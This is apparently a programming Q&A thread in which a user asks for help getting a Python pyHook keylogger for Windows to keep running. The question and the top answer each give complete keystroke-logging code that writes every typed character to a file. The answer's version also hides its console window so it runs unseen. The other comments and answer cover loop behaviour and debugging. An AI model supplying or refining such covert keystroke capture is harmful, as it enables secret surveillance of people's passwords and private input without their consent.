# Help with my keylogger

Tags: python, windows, keylogger

I'm working on a simple key logger. I'm having a problem though, when I try to run it as a .pyw the program shuts down before it can record anything. I believe it needs to loop, how would I go about this?

```
import pythoncom, pyHook, sys, logging, time


LOG_FILENAME = 'C:\KeyLog\log.out'



def OnKeyboardEvent(event):
    keytime = time.strftime('%I:%M %S %p            %A %B %d, %Y            |           ')
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')

    logging.log(10, keytime + "Key:    '" + chr(event.Ascii) + "'")


    if chr(event.Ascii) == "q":
        sys.exit(0)
    return True


hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
```

I'm using Windows 7 ,BTW.

Comment: Why are you writing a keylogger?

Comment: Because I thought it would be neat, It's not supposed to be secure or anything.

Comment: How about using `input()` to make it wait until you press enter?

Comment: Illegal code! Arrest him! Oh... wait..

Comment: Maybe do a `while True:` somewhere in there.

Comment: @vlad003, `PumpMessages` internally does the loop (until it receives a `WM_QUIT`, of course, not _forever_;-).  So adding another loop around it seems very weird.

Comment: Sorry. I've never used any of these modules before (and they're not available for me to try out) so I was just guessing :-)

Comment: I assume your starting point was http://sourceforge.net/apps/mediawiki/pyhook/index.php?title=PyHook_Tutorial#Keyboard_Hooks

Did this work as expected when using print instead of logging? It would help to know which step in refining your program made it fail for the first time.

Answer (score 6):

this is my simple example (your code is wrong):
(you need pyHook and win32api)

```
#!/usr/bin/python
import pyHook
import pythoncom
import win32gui
import win32console


log_file = "log_file.txt"                 #name of log file
window = win32console.GetConsoleWindow()  #go to script window
win32gui.ShowWindow(window,0)             #hide window

def pressed_chars(event):       #on key pressed function
    if event.Ascii:
        f = open(log_file,"a")  # (open log_file in append mode)
        char = chr(event.Ascii) # (insert real char in variable)
        if char == "q":         # (if char is q)
            f.close()           # (close and save log file)
            exit()              # (exit program)
        if event.Ascii == 13:   # (if char is "return")
            f.write("\n")       # (new line)
        f.write(char)           # (write char)



proc = pyHook.HookManager()      #open pyHook
proc.KeyDown = pressed_chars     #set pressed_chars function on KeyDown event
proc.HookKeyboard()              #start the function
pythoncom.PumpMessages()         #get input
```

pyHook:
http://sourceforge.net/projects/pyhook/?source=dlp

pyWin32:
http://sourceforge.net/projects/pywin32/

Answer (score 1):

open the program via the python idle (right klick edit with IDLE) go to Run and click run module(F5) then you can see the errors.

hint for debugging: look at wich line the error is at(other editors like atom.io wich i use for all my coding have line numbers) so you know where to look.

DOUBLE HINT: if you want to use an external editor but want to get error messages open cmd and go to the directory you program is in (`cd project-folder\second-folder` for example) and do `python <script name>` so for example `python keylogger.py`

edit:

`python script.py` may not work because python is not in the path variable [This](https://www.howtogeek.com/118594/how-to-edit-your-system-path-for-easy-command-line-access/) website explains how to add a program to your path